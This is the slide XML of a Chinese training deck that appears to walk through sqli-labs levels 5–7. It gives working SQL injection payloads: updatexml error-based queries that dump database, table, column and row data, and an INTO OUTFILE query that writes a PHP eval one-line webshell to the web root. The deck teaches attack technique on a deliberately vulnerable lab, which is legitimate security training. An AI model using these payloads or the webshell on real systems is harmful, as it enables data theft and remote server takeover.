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1457" r:id="rId2"/>
    <p:sldId id="1394" r:id="rId3"/>
    <p:sldId id="1484" r:id="rId4"/>
    <p:sldId id="1485" r:id="rId5"/>
    <p:sldId id="1486" r:id="rId6"/>
    <p:sldId id="1487" r:id="rId7"/>
    <p:sldId id="1488" r:id="rId8"/>
    <p:sldId id="1489" r:id="rId9"/>
    <p:sldId id="1490" r:id="rId1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4">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="371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6026" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="1042" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2014"/>
        <p:guide pos="3718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" y="-2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靶场原理详解（二）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第五关</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479376" y="1484784"/>
            <a:ext cx="694877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0485" y="1590675"/>
            <a:ext cx="87522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按照以往思路，寻找字段数以及显错位，发现这个地方并没有显错位，这个时候自然而然的就想到了盲注，这题确实是可以通过盲注去做，但是查看源码我们发现这个地方也会输出数据库的报错，这个时候我们也可以尝试去使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报错注入（其实好多盲注的地方同学都可以试试报错，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>因为有的时候报错注入的致命错误会显示出来，数据库只忽略普通报错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40485" y="3392805"/>
            <a:ext cx="5026025" cy="28346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updatexml()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7385" y="1203325"/>
            <a:ext cx="5337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updatexml() 更新xml文档的函数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7385" y="1705610"/>
            <a:ext cx="6520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语法：updatexml(目标xml内容，xml文档路径，更新的内容)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7385" y="2245360"/>
            <a:ext cx="110648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updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实际上这里是去更新了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档，但是我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档路径的位置里面写入了子查询，我们输入特殊字符，然后就因为不符合输入规则然后报错了</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>但是报错的时候他其实已经执行了那个子查询代码！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0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实际是是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进制，但是开头得写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是一个特殊符号，然后不符合路径规则报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>]   ~ ~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590" y="4017645"/>
            <a:ext cx="4744720" cy="21888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updatexml()用法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4205" y="1340485"/>
            <a:ext cx="109683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updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> () </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这个函数一般是配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用的，他和联合查询不同，不需要在意什么字段数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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select *from news where id=1 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>1,concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,(select database()),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>),1)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但是要注意，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>情况下只要一个为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，就会判定是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>False,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所以如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>前面的条件不成立的情况下，就不会执行之后的语句。所以使用的时候建议使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or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某些没有回显盲注也可以用这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>updatexml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做出来。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但是报错一般有长度限制，不能输出太长的数据，尽量不要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>group_concat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。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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5710" y="2060575"/>
            <a:ext cx="97764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判断是否存在注入：?id=1' and 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断库名：?id=1 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--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判断表名：?id=1 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit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判断列名：?id=1 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' 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判断数据：?id=1 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- qwe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第六关</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3720416" y="2744624"/>
            <a:ext cx="694877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6275" y="134048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这一关和上面做法相同，只是闭合的区别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5710" y="2060575"/>
            <a:ext cx="97764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判断是否存在注入：?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> and 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断库名：?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--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判断表名：?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit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判断列名：?id=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' 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判断数据：?id=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- qwe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第七关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72335" y="1772285"/>
            <a:ext cx="740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这一题的做法跟前面都不太一样，首先看到它提示我们使用outfile向服务器写入文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>那咱们就可以直接去试试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961005"/>
            <a:ext cx="9514205" cy="22498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35580" y="5158105"/>
            <a:ext cx="634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26820" y="1858010"/>
            <a:ext cx="1000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79550" y="1581150"/>
            <a:ext cx="78111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在利用sql注入漏洞后期，最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell，其中比较常用的函数有以下三个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94180" y="2780665"/>
            <a:ext cx="34232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into dumpfile()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>into outfile()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>load_file()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94180" y="5066665"/>
            <a:ext cx="82257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union select 1,'&lt;?php eval($_REQUEST[8])?&gt;' into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 'c:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/www/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'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694180" y="5795645"/>
            <a:ext cx="8132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这些都是需要设置secure_file_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，如果他为空则可以指定任意目录，如果有设置等于某个路径就只能在这个指定路径下，而他为null时则禁止导入导出功能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第七关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90065" y="1904365"/>
            <a:ext cx="8124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判断字段数：?id=1')) order by 3 -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>写马：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?id=1'))union select 1,"&lt;?php eval($_REQUEST[1])?&gt;",3 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> " D:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpStudy1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs-master/Less-7/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe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访问一句话木马生效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	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85" y="3824605"/>
            <a:ext cx="7344410" cy="25946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015,&quot;width&quot;:10665}"/>
</p:tagLst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1004</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>66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楷体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>sx272TGp_report_light</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>第五关</vt:lpstr>
      <vt:lpstr>updatexml()</vt:lpstr>
      <vt:lpstr>updatexml()用法</vt:lpstr>
      <vt:lpstr>第五关</vt:lpstr>
      <vt:lpstr>第六关</vt:lpstr>
      <vt:lpstr>第七关</vt:lpstr>
      <vt:lpstr>写马</vt:lpstr>
      <vt:lpstr>第七关</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>中国信息安全测评中心:cisp运营中心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随风</cp:lastModifiedBy>
  <cp:revision>3089</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-29T12:55:43Z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5EC77F3D4641451695A3550036DF892C</vt:lpwstr>
  </property>
</Properties>
</file>